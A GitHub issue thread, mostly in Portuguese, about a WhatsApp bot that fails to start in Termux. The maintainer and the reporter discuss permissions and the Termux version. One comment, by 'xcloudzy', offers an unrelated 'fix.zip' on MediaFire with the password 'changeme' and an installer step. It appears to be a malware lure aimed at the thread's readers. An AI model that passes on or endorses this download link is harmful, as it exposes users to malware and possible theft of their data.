### ISSUE TITLE
Bot com problema no termux

### ISSUE THREAD

**Issue by Ohjpedro** [victorsouzaleal/lbot-whatsapp#31]
Bom dia seu bote está tendo um erro no terminal termux quando temos que iniciar ele mesmo ele estando na atualização certa é os comandos estando corretos.![Screenshot_20240826-110037.png](https://github.com/user-attachments/assets/ca7417b1-b27b-41fe-ab9a-6da329dbf92b)

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by victorsouzaleal** [comment]
Acabei de fazer uma instalação limpa seguindo o tutorial e funcionou, no seu caso parece haver um problema de permissão. Certifique-se de estar usando a versão do Termux que coloquei no tutorial.

**Comment by Ohjpedro** [comment]
Infelizmente nao consegui, continua o  mesmo o problema; muito obrigando
por tenta ajuda infelizmente não vai,  mesmo seguindo todo o tutorial do
inicio ao fim, com o termux do seu link.

Em qui., 29 de ago. de 2024 09:38, João Victor ***@***.***>
escreveu:
